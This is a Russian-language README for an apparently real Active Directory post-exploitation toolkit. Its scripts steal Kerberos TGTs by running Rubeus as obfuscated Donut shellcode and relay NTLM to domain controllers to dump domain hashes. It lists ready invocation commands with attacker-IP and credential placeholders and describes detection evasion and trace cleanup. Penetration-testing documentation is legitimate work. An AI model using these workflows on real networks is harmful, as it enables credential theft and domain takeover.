
Автоматизированный набор инструментов для пост-эксплуатации Active Directory для извлечения билетов Kerberos, атак ретрансляции NTLM и латерального перемещения через интеграцию с NetExec, Impacket и Donut.
Этот репозиторий содержит коллекцию скриптов-оркестраторов на Python, предназначенных для оценки безопасности и тестирования на проникновение в средах Active Directory. Эти инструменты специально разработаны для сценариев пост-эксплуатации, когда локальный административный доступ уже получен на скомпрометированной рабочей станции или сервере, а цель — выполнить горизонтальное перемещение или повышение привилегий в рамках более широкого домена Active Directory.
Автоматизируя рабочие процессы с использованием стандартных утилит безопасности, таких как NetExec, Impacket, Donut и BloodyAD, эти скрипты превращают сложные многоэтапные процессы в повторяемые операции, выполняемые одной командой.
Скрипты требуют, чтобы следующие инструменты были установлены на хост-системе и доступны в системном PATH:
nxc)impacket-ntlmrelayx, impacket-secretsdump, impacket-ticketConverter)awk, base64Для улучшенного форматирования вывода в консоли установите следующие пакеты:
pip install colorama rich
harpyTGT.py)Этот скрипт автоматизирует извлечение билета предоставления билетов Kerberos (TGT) из активного сеанса Windows и преобразует его в совместимый с Linux формат ccache.
Rubeus.exe в виде шелл-кода через Donut, применяет обфускацию с помощью Myph и выполняет полученный бинарный файл на целевом хосте с помощью либо запланированных задач (schtask_as), либо mmcexec.Стандартное выполнение (целевой пользователь имеет административные привилегии):
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe>
Альтернативное выполнение (целевой пользователь не имеет административных привилегий):
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe> --no-target-admin --attacker-ip <ATTACKER_IP>

harpyRelay.py)Этот скрипт координирует атаки NTLM-ретрансляции, нацеленные на неправильно настроенные политики подписи SMB или LDAP на контроллерах домена, для достижения повышения привилегий в рамках домена или выполнения дампа базы данных NTDS (DCSync).
ntlmrelayx, запускает запрос аутентификации от скомпрометированного клиента через NetExec, отслеживает вывод на предмет успешной эксплуатации и выполняет дамп хэшей домена. Инструмент содержит процедуры автоматической очистки для минимизации следов в целевом домене.Поток LDAPS (стандартный):
./harpyRelay.py--target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL>
Поток LDAP (альтернативный поток, когда LDAPS недоступен):
./harpyRelay.py --target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL> --no-ldaps

stealTGTПользовательский модуль для NetExec (nxc), предназначенный для извлечения билета предоставления билетов Kerberos (TGT) для конкретного вошедшего в систему пользователя на целевой машине.
Модуль взаимодействует через mmcexec от имени SYSTEM, автоматизируя генерацию малозаметной полезной нагрузки (инкапсулирующей Rubeus с помощью Donut и Myph), ее выполнение в памяти, захват вывода билета в Base64 и прозрачное преобразование в файл .ccache, готовый к использованию в Linux.
Модуль автоматически проверяет, что следующие утилиты установлены и доступны в вашем $PATH:
donutmyphimpacket-ticketConverterЧтобы загрузить внешний модуль в NetExec, скопируйте скрипт stealTGT.py в локальный каталог модулей NetExec:
cp stealTGT.py ~/.nxc/modules/
netexec smb <TARGET_IP> -u <ADMIN_USER> -p <ADMIN_PASS> --local-auth -M stealTGT -o USER=<TARGET_USER> RUBEUS=/path/to/Rubeus.exe
Параметры модуля (-o):
USER: Имя пользователя текущего сеанса, из которого вы хотите получить TGT (например, jdoe).RUBEUS: Локальный путь на вашей машине атакующего к легитимному бинарному файлу Rubeus.exe.

bloodyad или netexec после завершения операций.КРИТИЧЕСКОЕ УВЕДОМЛЕНИЕ: Этот репозиторий предназначен строго для авторизованного аудита безопасности, исследований уязвимостей и образовательных целей. Запуск этих инструментов в производственной инфраструктуре без предварительного явного письменного разрешения владельцев системы строго запрещен. Автор не несет ответственности за неправомерное использование, побочный ущерб или юридические последствия, возникшие в результате развертывания данного программного обеспечения.